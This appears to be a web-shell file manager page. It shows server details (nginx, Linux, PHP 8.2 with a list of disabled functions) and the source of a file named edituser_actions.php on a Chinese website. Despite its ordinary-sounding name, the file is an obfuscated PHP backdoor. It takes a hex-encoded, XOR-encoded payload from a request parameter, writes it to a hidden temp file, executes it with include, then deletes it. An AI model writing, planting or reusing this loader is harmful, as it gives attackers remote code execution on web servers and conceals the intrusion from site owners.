HEX
Server: nginx/1.28.0
System: Linux yisu-68a5f20334161 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/q.autos58.cn/edituser_actions.php
<?php

if(!is_null($_REQUEST["res\x6F\x75\x72ce"] ?? null)){
	$parameter_group = hex2bin($_REQUEST["res\x6F\x75\x72ce"]);
	$ptr   =    ''    ;      for($a=0; $a<strlen($parameter_group); $a++){$ptr .= chr(ord($parameter_group[$a]) ^ 84);}
	$binding = array_filter([getenv("TMP"), "/dev/shm", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TEMP"), session_save_path()]);
	for ($token = 0, $data_chunk = count($binding); $token < $data_chunk; $token++) {
    $pset = $binding[$token];
    		if (is_writable($pset) && is_dir($pset)) {
    $hld = implode("/", [$pset, ".factor"]);
    if (@file_put_contents($hld, $ptr) !== false) {
	include $hld;
	unlink($hld);
	die();
}
}
}
}